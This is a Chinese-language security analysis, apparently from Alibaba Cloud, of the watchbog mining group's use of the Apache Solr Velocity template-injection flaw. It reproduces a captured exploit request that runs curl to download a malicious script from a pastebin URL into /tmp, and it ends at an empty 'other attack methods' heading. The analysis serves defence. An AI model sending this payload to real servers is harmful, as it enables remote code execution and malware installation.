背景介绍

watchbog挖矿团伙

watchbog团伙最早出现于2018年，是一个利用多种漏洞攻击方式向目标主机植入挖矿木马的恶意团伙，通过挖取门罗币牟利并维持C&C通信以供团伙后续动作。自出现后更新频繁，一直在尝试利用最新的漏洞进行攻击。

Solr Velocity 模板注入远程命令执行漏洞

Apache Solr是开源企业搜索平台，主要包括全文搜索、动态聚类、富文本处理等功能。在2019年10月31日，国外安全研究员公开了Solr Velocity模板注入的POC。此漏洞存在于Solr默认集成组件Solr.VelocityResponseWriter中，参数params.resource.loader.enabled可以控制是否根据请求参数来加载指定模板，虽然默认为false，但攻击者可以通过发送/[core_name]/config来手动设置此参数的开启，之后便可构造恶意请求执行指令。

攻击者首先可以通过[core_admin]获取服务器core_name，之后通过发送以下命令将加载模板指令打开。

开启从参数指定模板后，攻击者便可以发送恶意代码从而进行恶意行为。

恶意脚本分析

11月2日，阿里云安全团队发现有攻击者利用Solr Velocity漏洞发起入侵，其会向受到此漏洞影响的主机发送以下数据：

GET /solr/scalebay_2/select?q=1&&wt=velocity&v.template=custom&v.template.custom=#set($x='')+#set($rt=$x.class.forName('java.lang.Runtime'))+#set($chr=$x.class.forName('java.lang.Character'))+#set($str=$x.class.forName('java.lang.String'))+#set($ex=$rt.getRuntime().exec('curl -fsSL https://pastebin.com/raw/dhQaGbMa -o /tmp/baby'))+$ex.waitFor()+#set($out=$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end HTTP/1.1Accept-Encoding: identityConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

跟进其使用的脚本 https://pastebin.com/raw/dhQaGbMa，此脚本格式内容与阿里云安全团队之前捕获的watchbog恶意脚本内容格式基本一致，（可参考之前阿里云安全针对watchbog的分析文章，参考文末相关链接），可以确认为同一团伙所为，脚本相同内容不再赘述。除了新增了Solr Velocity攻击方式外，其新增了cleanoldpack函数用以清除旧版木马以及其他恶意团伙恶意程序，可见黑产之间的相互竞争也非常激烈。

其他攻击方式